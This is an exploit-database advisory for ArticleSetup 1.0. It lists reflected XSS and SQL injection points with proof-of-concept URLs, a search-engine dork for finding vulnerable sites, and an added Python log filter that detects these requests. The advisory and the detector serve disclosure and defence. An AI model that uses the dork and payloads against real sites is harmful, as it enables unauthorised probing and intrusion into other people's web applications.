ArticleSetup - Multiple Vulnerabilities

Author: DevilScreaM
type: webapps
platform: php
port: 
date_added: 2013-09-29 
date_updated: 2013-09-29 
verified: 1 
codes: OSVDB-80786;OSVDB-80782;OSVDB-80781 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt29000/articlesetup.png 
application_url: 

#Exploit Title 		: ArticleSetup Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 21/09/2013
#Category		: Web Applications
#Vendor 		: http://www.articlesetup.com/
#Version 		: 1.0

#Dork
intext:Powered By Article Marketing

#Vulnerability  	: Cross Site Scripting, SQL Injection
#Tested On 		: Windows 7, Ubuntu (Mozilla & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker


Cross Site Scripting

http://site-target/search.php?s=[XSS]


#XSS in Admin Page

http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>


===================================================================================

SQL Injection Vulnerability

http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]

Example

http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'

====================================================================================
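
Added example, not part of the original advisory or of ArticleSetup: a Python access-log filter that flags requests to the endpoints listed above (search.php, admin/search.php, feed.php) whose s or cat parameter carries markup or SQL metacharacters. The log format, the regexes and the treatment of cat as a numeric id are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> parameter, as listed in the advisory
# (search.php also covers admin/search.php).
WATCHED = {"search.php": "s", "feed.php": "cat"}

# Assumption: common/combined log format with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic patterns chosen for this example, not an exhaustive filter.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.I)
SQL_META_RE = re.compile(r"['\"`;]|--|/\*|\b(?:union|select)\b", re.I)


def classify(line):
    """Return sorted findings ('sqli', 'xss') for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    param = WATCHED.get(url.path.rsplit("/", 1)[-1])
    if param is None:
        return []
    findings = set()
    # parse_qs percent-decodes values, so %27 and %3C are seen as ' and <.
    for value in parse_qs(url.query).get(param, []):
        if MARKUP_RE.search(value):
            findings.add("xss")
        if SQL_META_RE.search(value):
            findings.add("sqli")
        # Assumption: cat is a numeric category id, as in the cat=100 example.
        if param == "cat" and not value.isdigit():
            findings.add("sqli")
    return sorted(findings)


def scan(lines):
    """Return (line_number, findings) for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]


# Constructed sample entries (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [29/Sep/2013:10:00:01 +0000] "GET /search.php?s=php+tutorial HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Sep/2013:10:01:40 +0000] "GET /admin/search.php?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900',
    '203.0.113.9 - - [29/Sep/2013:10:02:05 +0000] "GET /feed.php?cat=100%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [29/Sep/2013:10:02:11 +0000] "GET /search.php?s=123\' HTTP/1.1" 200 812',
    '203.0.113.9 - - [29/Sep/2013:10:03:00 +0000] "GET /feed.php?cat=7 HTTP/1.1" 200 4096',
]
```

A quote in a search term can be legitimate, so treat hits on s as triage signals; a non-numeric cat is the stronger indicator under the numeric-id assumption.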